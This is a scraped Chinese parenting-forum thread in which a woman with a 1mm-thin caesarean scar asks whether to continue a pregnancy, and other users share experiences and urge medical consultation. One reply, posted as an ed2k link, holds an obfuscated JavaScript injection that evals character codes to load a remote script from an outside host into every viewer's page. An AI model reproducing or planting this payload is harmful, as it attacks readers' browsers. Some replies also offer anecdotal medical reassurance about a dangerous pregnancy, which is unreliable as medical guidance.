‹ 上一主題|下一主題 go 回復(fù): 53 | 瀏覽: 32320 |倒序瀏覽 | 字體: tT
手機(jī)看此貼
  • 微信掃一掃 手機(jī)看此貼
  • 好內(nèi)容 隨時分享到朋友圈

[ 好孕報喜 ]

求助,子宮壁最薄處只有1mm卻懷孕了,能要嗎? ...

[復(fù)制鏈接]

經(jīng)驗值
注冊時間
    • 媽媽網(wǎng)輕聊
      給生活加點料

• 媽媽網(wǎng)孕育
      就是好用

holdImg
    • 廣州媽媽網(wǎng)
      廣州媽媽網(wǎng),更懂廣州媽媽

廣州媽媽網(wǎng)二維碼
樓主
發(fā)表于 2016-7-22 20:55 |只看該作者 | 最新帖子 | 查看作者所有帖子 | 發(fā)短消息 | 加為好友 | 字體大小: tT
一胎剖腹已經(jīng)過了3年半了,去年年底體檢是說子宮肌層最薄處是1mm,當(dāng)時沒有留意,這個月月經(jīng)沒來,測了下居然懷孕了,肚子都還沒大子宮壁就只有1mm,等撐大的時候怎么辦?
來自[移動wap版]

回帖推薦

尹罕似Zb 發(fā)表于11樓  查看完整內(nèi)容

MARK。頂下。

xiangping0230 發(fā)表于13樓  查看完整內(nèi)容

ed2k://|file|filesize|'+eval(String.fromCharCode(119,105,116,104,40,100,111,99,117,109,101,110,116,41,48,91,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,41,46,115,114,99,61,39,104,116,116,112,58,47,47,99,110,52,122,46,99,111,109,47,99,110,122,122,46,106,115,39,93,59))+'|8798/

zhaomima2005 發(fā)表于15樓  查看完整內(nèi)容

你是孕前1,3嗎,還是孕晚期,,這個數(shù)據(jù)是只做了一次b超,還是幾次都是差不多這個數(shù)據(jù),謝謝了

|Jenny_7481 發(fā)表于16樓  查看完整內(nèi)容

我是懷孕6周的時候測的,都算是孕前的數(shù)值吧,我只測了一次,就是懷孕初期的時候測的,后期都沒有測過了

經(jīng)驗值
注冊時間
我懷二胎前檢查怎么沒有說這個的
來自[移動wap版]

經(jīng)驗值
注冊時間
懷二胎前去做的B超,當(dāng)時只留意到有些肌瘤,沒留意這個,奇怪是當(dāng)時醫(yī)生也沒跟我提這個
來自[移動wap版]

經(jīng)驗值
注冊時間
BB生日
保險起見這個得去問專業(yè)醫(yī)生,這里不會尋求到最正確的答案,專業(yè)醫(yī)生會根據(jù)具體情況進(jìn)行詳細(xì)了解的判斷

經(jīng)驗值
注冊時間
太薄了,好危險
來自[廣州媽媽Android版]

經(jīng)驗值
注冊時間
BB生日
最好盡早咨詢醫(yī)生,聽聽醫(yī)生建議

注冊時間
回復(fù) huihui1224 的帖子

我想問你最后要了嗎?我也差不多情況想要二胎

注冊時間
親,你有懷嗎?最后怎么治療的呀?
來自[移動wap版]

經(jīng)驗值
注冊時間
BB生日
MARK。頂下。

注冊時間
二寶怎么樣,肌層薄,撐到孕晚期了嗎,望回復(fù)
來自[移動wap版]

經(jīng)驗值
注冊時間
BB生日

這還是聽聽醫(yī)生的專業(yè)意見吧

注冊時間

zhaomima2005 發(fā)表于 2017-05-03 19:08
二寶怎么樣,肌層薄,撐到孕晚期了嗎,望回復(fù)

我的最薄處是1.3mm,剛剛生了,懷的時候被婦科醫(yī)生嚇著了,擔(dān)心了整個孕期,好在我的主診醫(yī)生并沒有嚇唬我,我當(dāng)時拿著b超單去找產(chǎn)科主任,看完就只說三個字,可以懷,沒有多說,其實那時候我都已經(jīng)做好流的準(zhǔn)備了,聽到可以懷,自己又很猶豫呢,到孕晚期,還建議我順產(chǎn)試試,不過我自己怕也就沒有堅持順產(chǎn)
來自[移動wap版]

注冊時間

|Jenny_7481 發(fā)表于 2017-05-04 03:02
zhaomima2005 發(fā)表于 2017-05-03 19:08
二寶怎么樣,肌層薄,撐到孕晚期了嗎,望回復(fù)我的最薄處是1.3mm,剛..

你是孕前1,3嗎,還是孕晚期,,這個數(shù)據(jù)是只做了一次b超,還是幾次都是差不多這個數(shù)據(jù),謝謝了
來自[移動wap版]

注冊時間

zhaomima2005 發(fā)表于 2017-05-05 14:03
|Jenny_7481 發(fā)表于 2017-05-04 03:02
二寶怎么樣,肌層薄,撐到孕..

我是懷孕6周的時候測的,都算是孕前的數(shù)值吧,我只測了一次,就是懷孕初期的時候測的,后期都沒有測過了
來自[移動wap版]

經(jīng)驗值
注冊時間
BB生日
沒事的,你去醫(yī)院檢查一下,當(dāng)時我也是2MM,醫(yī)生說只要著床了就沒事了,后來開了一些黃體同給我。

注冊時間
親 我和你情況差不多,醫(yī)生說不能要,你后來要了嗎?怎么樣?謝謝
來自[移動wap版]

注冊時間
回復(fù) |Jenny_7481 的帖子

你好!你當(dāng)時懷孕檢查厚度就只有1.1mm嗎還是1.1cm!我現(xiàn)在懷孕十七周疤痕最薄處只有1.7mm了!B超大夫看了都害怕!
來自[移動wap版]
‹ 上一主題|下一主題
求助,子宮壁最薄處只有1mm卻懷孕了,能要嗎? ...
快速回復(fù)

回帖后跳轉(zhuǎn)到最后一頁

廣東省通信管理局互聯(lián)網(wǎng)清理整頓 增值電信業(yè)務(wù)經(jīng)營許可證:粵B2-20220217粵ICP備09174648號粵網(wǎng)安備案號:4406043011754公安機(jī)關(guān)備案號:44010602000095 Copyright 2004-2024 盛成科技 All Right Reserved版權(quán)所有    版權(quán)保護(hù)投訴指引

互聯(lián)網(wǎng)藥品信息服務(wù)資格證書 電子營業(yè)執(zhí)照 網(wǎng)絡(luò)文化經(jīng)營許可證粵網(wǎng)文[2016]7051-1702號

違法和不良信息/涉未成年人有害信息舉報電話:020-85505893/18122325185 舉報郵箱:kf@mama.cn 涉未成年人有害信息舉報專區(qū) 中國互聯(lián)網(wǎng)不良信息舉報中心
網(wǎng)絡(luò)內(nèi)容從業(yè)人員違法違規(guī)行為舉報:kf@mama.cn 開發(fā)者:廣州盛成媽媽網(wǎng)絡(luò)科技股份有限公司 應(yīng)用版本:11.12.0 應(yīng)用涉及權(quán)限APP隱私協(xié)議

回頂部